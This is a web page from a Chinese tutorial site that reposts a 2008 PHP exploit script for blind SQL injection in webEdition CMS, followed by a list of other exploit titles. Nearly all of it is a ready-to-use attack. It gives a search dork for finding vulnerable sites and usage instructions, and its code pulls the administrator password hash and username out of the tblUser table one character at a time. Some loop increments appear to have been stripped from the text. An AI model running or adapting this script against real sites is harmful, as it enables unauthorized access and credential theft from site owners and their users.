手机
当前位置:查字典教程网 >网络安全 >Exploit >webEdition CMS (we_objectID) Blind SQL Injection Exploit
webEdition CMS (we_objectID) Blind SQL Injection Exploit
摘要:

<?php

ini_set("max_execution_time",0);

print_r('

###############################################################

#

# WebEdition CMS - Blind SQL Injection Exploit

#

# Vulnerability discovered by: Lidloses_Auge

# Exploit coded by: Lidloses_Auge

# Special Greetz to: H4x0r007 (who sent me a vulnerable Page)

# Greetz to: -=Player=- , Suicide, g4ms3, enco,

# GPM, Free-Hack, Ciphercrew, h4ck-y0u

# Date: 20.08.2008

#

###############################################################

#

# Dork: inurl:we_objectID=

# Admin Panel: [Target]/webEdition/

# Usage: php '.$argv[0].' [Target] [Userid]

# Example for http://www.site.com/en/****.php?we_objectID=21

# => php '.$argv[0].' http://www.site.com/en/****.php?we_objectID=21 1

#

###############################################################

');

if ($argc > 1) {

$url = $argv[1];

if ($argc < 3) {

$userid = 1;

} else {

$userid = $argv[2];

}

$r = strlen(file_get_contents($url."'and 1=1/*"));

echo "nExploiting:n";

$w = strlen(file_get_contents($url."'and 1=0/*"));

$t = abs((100-($w/$r*100)));

echo "Password: ";

for ($j = 1; $j <= 32; $j ) {

for ($i = 46; $i <= 102; $i=$i 2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url."'and ascii(substring((select passwd from tblUser where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url."'and ascii(substring((select passwd from tblUser where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 102;

}

}

}

echo "nUsername: ";

for ($i=1; $i <= 30; $i ) {

$laenge = strlen(file_get_contents($url."'and ascii(substring((select username from tblUser where id=".$userid." limit 0,1),".$i.",1))!=0/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$count = $i;

$i = 30;

}

}

for ($j = 1; $j < $count; $j ) {

for ($i = 46; $i <= 122; $i=$i 2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url."'and ascii(substring((select username from tblUser where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url."'and ascii(substring((select username from tblUser where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 122;

}

}

} } else {

echo "nExploiting failed: Not enough arguments?n";

}

?>

【webEdition CMS (we_objectID) Blind SQL Injection Exploit】相关文章:

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

精品推荐
分类导航